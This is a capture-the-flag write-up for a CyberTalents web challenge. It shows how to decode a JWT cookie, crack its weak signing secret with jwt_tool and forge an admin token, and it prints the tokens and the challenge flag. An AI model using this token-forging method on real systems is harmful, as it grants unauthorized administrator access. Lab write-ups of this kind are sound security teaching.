Challenge Name: admin gate first
Flag is safe in the admin account info
this is the challenge link → admin gate first » CyberTalents
I wanna say that by the challenge name we could analyze what is required from us in the challenge like by looking at the name and description we could know that it depends on Broken Access control vulnerability which means that we will take control on the admin account so let’s remeber what is the broken access control vulnerability?
Broken Access Control is a security vulnerability that occurs when an application does not properly enforce user permissions, allowing unauthorized users to access resources, functions, or data they shouldn’t be able to. This flaw is commonly found in web applications and is a serious issue because it can lead to data breaches, privilege escalation, and unauthorized system control.
Let’s get back to our challenge:
It’s an interface and we now are gonna analyze it, so it’s an interface which contains two input fields and in the top of the page it gave us a credential
User: test
Pass: test
so let’s use the given credential and press login.
I’ve solved this challenge on tryhackme before and it’s main idea is changing the username and the role but it’s not that easy, those username and role are encrypted like we are gonna see after opening the challenge on firefox to use the developers tools which will give us more control:
and after that we will open Storage section and look at the Cookies and we will see :
in the cookies we found a JWT token and it contains three parts, every dot separates each part and to make it easy for you I used 3 diff colors to highlight each part, now We need to decode each part, and I will use my kali terminal to decode it using the following command:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcInRlc3RcIixcInJvbGVcIjpcInVzZXJcIn0ifQ.XSPy0jZd8CEtHl2e3C1SjPaewco1tjO3iajbkJy2OFQ
echo ”our encoded texts” | base64 -d
the header part of the decoding gave us :
{“typ”:”JWT”,”alg”:”HS256"}
means:
- The token is a JWT.
- It uses HMAC-SHA256 as the signing algorithm.
so let’s decode the payload part :
The signature part is 123456 I found it by using jwt_tool
so we look like we are close to get the flag, all what we have to do rn is change the role from user to admin and refresh the page to see what is gonna happen.
I will edit the text first then I’ll encode it to base64 by using this command:
echo -n ‘your_string’ | base64
Edit the JWT Token
{
“typ”: “JWT”,
“alg”: “HS256”
}
{
“data”: “{\”username\”:\”test\”,\”role\”:\”admin\”}”
}
the new token:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcInRlc3RcIixcInJvbGVcIjpcImFkbWluXCJ9In0.jHijo7pYELY4DJG20h2xCRiKRqW3HCdB1AnyOGsTNUw
and then we will put the new token in the value column and press on refresh the page and congratulations you found the flag:
J!W!T#S3cr3T@2018
Happy Hacking :)
